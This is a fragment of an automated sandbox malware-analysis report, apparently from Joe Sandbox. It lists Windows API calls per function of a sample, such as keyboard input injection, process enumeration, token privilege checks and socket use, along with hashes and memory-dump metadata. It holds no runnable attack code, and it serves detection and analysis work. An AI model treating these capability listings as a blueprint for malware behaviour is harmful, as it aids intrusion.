                                                                                                                        • API String ID: 2978978980-590756393
                                                                                                                        • Opcode ID: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
                                                                                                                        • Instruction ID: 9d9a95a7db6a4abb988c022aa4904b02f30f53cebd6b163eaa9ec8997abdc26b
                                                                                                                        • Opcode Fuzzy Hash: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
                                                                                                                        • Instruction Fuzzy Hash: 52116D71500208AFEF118E64DC48AAF3F6AFB5A378F504724FA61971D0C771DC959B60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00571C46
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                                                        • API String ID: 624084870-2258501812
                                                                                                                        • Opcode ID: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
                                                                                                                        • Instruction ID: 1ed53540a4fb225e058c0ca27bc0fbcb6ae22f75b40d3c3dadd142d70f95ccc8
                                                                                                                        • Opcode Fuzzy Hash: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
                                                                                                                        • Instruction Fuzzy Hash: 1401FC7164010566DB15E7D4D95A9FF7FACBF51340F200016A80A672C1EA209E08A6B5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA
                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00571CC8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                                                        • API String ID: 624084870-2258501812
                                                                                                                        • Opcode ID: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
                                                                                                                        • Instruction ID: 8e6eb290ae1d6c6b4aab50148884e3fb06073902ca1ef74948d86ff6d13b0da8
                                                                                                                        • Opcode Fuzzy Hash: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
                                                                                                                        • Instruction Fuzzy Hash: CC012B7164051567DB15EBD8DA16AFE7FACBF51380F104016B84677281EA208F08E2B5
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58C1
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58EE
                                                                                                                        • DrawMenuBar.USER32(?), ref: 005A58FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                        • Opcode ID: 1302e4f43df2d1f65a8453b22f754570f0ac5f09b56e150895bab1d063915edd
                                                                                                                        • Instruction ID: c7d871573c25bb420818d4a14f52760362fc881f762fb8be5d11e86f48b69884
                                                                                                                        • Opcode Fuzzy Hash: 1302e4f43df2d1f65a8453b22f754570f0ac5f09b56e150895bab1d063915edd
                                                                                                                        • Instruction Fuzzy Hash: FD010C31500219EEDB619F11E844FAFBFB8BF46361F1484A9F849DA151EB308A94EF21
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,005E18B0,005AA364,000000FC,?,00000000,00000000,?,?,?,005676CF,?,?,?,?,?), ref: 005A7805
                                                                                                                        • GetFocus.USER32 ref: 005A780D
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        • SendMessageW.USER32(0151DD40,000000B0,000001BC,000001C0), ref: 005A787A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3601265619-2594219639
                                                                                                                        • Opcode ID: ce804ebf91304147ff32e00b4b346973bbdabf3e84755428d756d45709ca7d01
                                                                                                                        • Instruction ID: 10ed5ce38dfa713cc4349858b31e83064f1f2be7da34a4374797c00e1ecd8809
                                                                                                                        • Opcode Fuzzy Hash: ce804ebf91304147ff32e00b4b346973bbdabf3e84755428d756d45709ca7d01
                                                                                                                        • Instruction Fuzzy Hash: E50184316055118FC729DB28EC5CABA3FE6FF9B360F18026DE0558B2A1CB316C06CB40
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0056D3BF
                                                                                                                        • FreeLibrary.KERNEL32 ref: 0056D3E5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 3013587201-2590602151
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 005705F0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 00570608
• CLSIDFromProgID.OLE32(?,?,00000000,005ACC40,000000FF,?,00000000,00000800,00000000,?,005AFC08,?), ref: 0057062D
• _memcmp.LIBVCRUNTIME ref: 0057064E
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00591AFD
• WSAGetLastError.WSOCK32 ref: 00591B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00591B8A
• WSAGetLastError.WSOCK32 ref: 00591B94
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00585783
• GetLastError.KERNEL32(?,00000000), ref: 005857A9
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005857CE
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005857FA
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,00536D71,00000000,00000000,005382D9,?,005382D9,?,00000001,00536D71,?,00000001,005382D9,005382D9), ref: 0054D910
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0054D999
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0054D9AB
• __freea.LIBCMT ref: 0054D9B4
  • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
APIs
• GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 0057ABF1
• SetKeyboardState.USER32(00000080,?,00008000), ref: 0057AC0D
• PostMessageW.USER32(00000000,00000101,00000000), ref: 0057AC74
• SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 0057ACC6
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
• Instruction ID: 48b198dd83313fb857cdd5a0f827b44f9b8d15db2bf5d32bf5664fbce874f750
• Opcode Fuzzy Hash: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
• Instruction Fuzzy Hash: A631E730A00618BFFF26CB65A809BFE7EA9BBC5310F04C61AF489561D1C3758D85A752
APIs
• ClientToScreen.USER32(?,?), ref: 005A769A
• GetWindowRect.USER32(?,?), ref: 005A7710
• PtInRect.USER32(?,?,005A8B89), ref: 005A7720
• MessageBeep.USER32(00000000), ref: 005A778C
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
• Instruction ID: 027ccd4b9684eaa5016031f3e9ebcee76028b9eb94039745946855cd2a3821d0
• Opcode Fuzzy Hash: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
• Instruction Fuzzy Hash: 3E418738A096599FCB01CF58CC94EADBFF4FB9E300F1940A8E854DB261C730A985DB90
APIs
• GetForegroundWindow.USER32 ref: 005A16EB
  • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
  • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
  • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
• GetCaretPos.USER32(?), ref: 005A16FF
• ClientToScreen.USER32(00000000,?), ref: 005A174C
• GetForegroundWindow.USER32 ref: 005A1752
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
• Instruction ID: 697dcada456007c4ff9dd02e4da64457bfeb40fe9f98f048e87ef06e840727e9
• Opcode Fuzzy Hash: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
• Instruction Fuzzy Hash: 50310C75D00249AFDB04EFA9C8858EEBBF9FF89304B5480A9E415A7211D6319E45CBA0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
• Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
• Process32NextW.KERNEL32(00000000,?), ref: 0057D52F
• CloseHandle.KERNEL32(00000000), ref: 0057D5DC
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: 16d382a02c50643d4d4c996df796cf65c4b3a0b6f4f21fe1dde1722864ba01c3
• Instruction ID: 0cbd07d4ea5bc414d7b2edae0afe1046bfdd6431b579897f7af5bc7426a4cc97
• Opcode Fuzzy Hash: 16d382a02c50643d4d4c996df796cf65c4b3a0b6f4f21fe1dde1722864ba01c3
• Instruction Fuzzy Hash: 2D318D71108301AFD301EF54D885AAFBFF8BFD9344F10492DF585821A1EB719988DBA2
APIs
  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
• GetCursorPos.USER32(?), ref: 005A9001
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00567711,?,?,?,?,?), ref: 005A9016
• GetCursorPos.USER32(?), ref: 005A905E
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00567711,?,?,?), ref: 005A9094
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
• Instruction ID: 78e1e6217114ea4b349123317358e3a9b9251f61f825ac4805193c2b6f17d459
• Opcode Fuzzy Hash: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
• Instruction Fuzzy Hash: FB217F35600128EFDB298F94D898EEE7FB9FF8B390F144055F9058B2A1C7319990EB60
APIs
• GetFileAttributesW.KERNEL32(?,005ACB68), ref: 0057D2FB
• GetLastError.KERNEL32 ref: 0057D30A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0057D319
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005ACB68), ref: 0057D376
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
• Instruction ID: dd30ee54f9184e214da932fee3480280e124b6e1bb3a7ee98d63dbb2bdbe9ca2
• Opcode Fuzzy Hash: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
• Instruction Fuzzy Hash: AF2180745042029FC700DF28D8858AA7FF4BE96324F508E1DF499C32A1DB319949DBA3
APIs
  • Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
  • Part of subcall function 00571014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
  • Part of subcall function 00571014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
  • Part of subcall function 00571014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
  • Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005715BE
• _memcmp.LIBVCRUNTIME ref: 005715E1
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00571617
• HeapFree.KERNEL32(00000000), ref: 0057161E
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
• Opcode ID: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
• Instruction ID: d5148ed50c7442a1c90b073f158862b54e62c827c84e81460b17fbc756df0d60
• Opcode Fuzzy Hash: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
• Instruction Fuzzy Hash: 9D219C31E00509AFDF14DFA8D948BEEBBB8FF40344F188459E445AB241E730AA04EB54
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 005A280A
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2824
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2832
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005A2840
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169480361-0
                                                                                                                        • Opcode ID: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
                                                                                                                        • Instruction ID: 529f2b07e0fae0fc4c9482cf087dd956be51e61ec344ad3607c5499105e7dddb
                                                                                                                        • Opcode Fuzzy Hash: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
                                                                                                                        • Instruction Fuzzy Hash: AA21A435604512AFE7149B28C846FAA7F95FF86324F148158F4268B6D2CB75FD82CB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00578D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578D8C
                                                                                                                          • Part of subcall function 00578D7D: lstrcpyW.KERNEL32(00000000,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00578DB2
                                                                                                                          • Part of subcall function 00578D7D: lstrcmpiW.KERNEL32(00000000,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578DE3
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577923
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577949
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577984
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        • Opcode ID: ff143ab0125d82191432fe75cf55cef0a36e0504be0ad24b23bd59052947e8e6
                                                                                                                        • Instruction ID: c69ba510e992c9c8427f7d54099250042fd95d3cfc8c97201ea3779e63ac3bd1
                                                                                                                        • Opcode Fuzzy Hash: ff143ab0125d82191432fe75cf55cef0a36e0504be0ad24b23bd59052947e8e6
                                                                                                                        • Instruction Fuzzy Hash: E011EC3A201706AFCB155F34F849D7B7BA9FF99350B50802AF946C72A4EF319811E791
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00571A47
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A59
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A6F
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
